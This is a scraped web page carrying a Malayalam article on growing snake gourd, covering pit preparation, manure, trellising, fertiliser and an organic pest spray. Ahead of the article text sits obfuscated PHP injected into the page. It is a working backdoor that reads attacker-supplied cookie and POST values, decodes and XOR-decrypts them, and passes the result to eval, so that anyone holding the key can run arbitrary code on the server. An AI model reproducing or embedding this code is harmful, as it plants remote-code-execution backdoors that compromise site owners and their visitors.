$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} എളുപ്പത്തിൽ ചെയ്യാം പടവല കൃഷി; കുറച്ചു പരിചരണവും മികച്ച വിളവും – Mannira

എളുപ്പത്തിൽ ചെയ്യാം പടവല കൃഷി; കുറച്ചു പരിചരണവും മികച്ച വിളവും

കുറച്ചു പരിചരണവും മികച്ച വിളവും തരുമെന്നതിനാൽ എളുപ്പത്തിൽ ചെയ്യാവുന്ന ഒന്നാണ് പടവല കൃഷി.
കേരളത്തിലെ കാലാവസ്ഥയ്ക്ക് അനുയോജ്യമായ പടവലം ശക്തായ മഴ മാറി നല്ല വെയില്‍ കിട്ടുന്ന സമയത്താണ് കൃഷി ചെയ്യാൻ ഉത്തമം. വിത്ത് പാകിയാണ് കൃഷിയിറക്കുന്നത്. ഗ്രോ ബാഗില്‍ വളര്‍ത്താന്‍ ഏറ്റവും അനുയോജ്യമായ പച്ചക്കറിയാണ് പടവലം.

വിത്തിടുന്നതിനു മുമ്പായി രണ്ടു മീറ്റര്‍ അകലത്തില്‍ ഒന്നര അടി നീളത്തിൽ സമചതുരത്തിലുതും താഴ്ചയുള്ളതുമായ കുഴികളെടുക്കണം. ചാണകപൊടി, കരിയിലകള്‍, കടലപിണ്ണാക്ക് എന്നിവ മണ്ണിൽ ചേര്‍ത്തതിനു ശേഷം 3-4 സെ.മീ താഴ്ചയില്‍ വിത്ത് പാകാം. മുളപ്പിച്ച വിത്തുകള്‍ പാകുന്നതാണ് കൂടുതല്‍ നല്ലത്.

ഇവ രണ്ടില പാകം ആകുന്നതു വരെ വെയില്‍ കൊള്ളാതെ സൂക്ഷിക്കണം. ചെടികളിൽ വള്ളി മുളക്കുമ്പോൾ താങ്ങായി ചെറിയ കമ്പുകള്‍ നാട്ടികൊടുക്കണം. 5-6 അടി ഉയരത്തില്‍ പന്തലിട്ട് വള്ളി പടരാൻ അനുവദിക്കണം. വിത്ത് മുളച്ചു 20 ദിവസത്തിനു ശേഷം കടലപ്പിണ്ണാക്ക്, ചാരം, എല്ലുപൊടി എന്നിവ വളമായി ഇടാം.

ചെടികൾ പൂവിട്ടാൽ കടലപ്പിണ്ണാക്ക് പുളിപ്പിച്ചത് ആഴ്ചയില്‍ ഒരിക്കല്‍ വീതം നൽകണം. ഇലചുരുട്ടിപ്പുഴു, കായീച്ച, തണ്ടുതുരപ്പന്‍ എന്നിവയാണ് പടവലത്തിന് പ്രധാന ഭീഷണി. ഇവയെ തുരത്താൻ ഗോമൂത്രം, കാന്താരി, വെളുത്തുള്ളി എന്നിവ ചേർന്ന മിശ്രിതം സ്‌പ്രേ ചെയ്യാം. വിറ്റാമിന്‍ എ, സി, തയമിന്‍ എന്നിവയാൽ സമ്പുഷ്ടമാണ് പടവലം. നാരുകള്‍ ധാരാളമായി അടങ്ങിയിരിക്കുന്നതിനാല്‍ ദഹനപ്രക്രിയയ്ക്കും പടവലം ഉത്തമമാണ്. കൂടാതെ മുടിയുടെ വളര്‍ച്ചക്കും പടവലം സഹായിക്കുന്നു.

Also Read: പലവഴിയിൽ ആദായം നേടിത്തരും കൂവ കൃഷി; അറിയേണ്ട കാര്യങ്ങൾ

Image: karshikarangam.com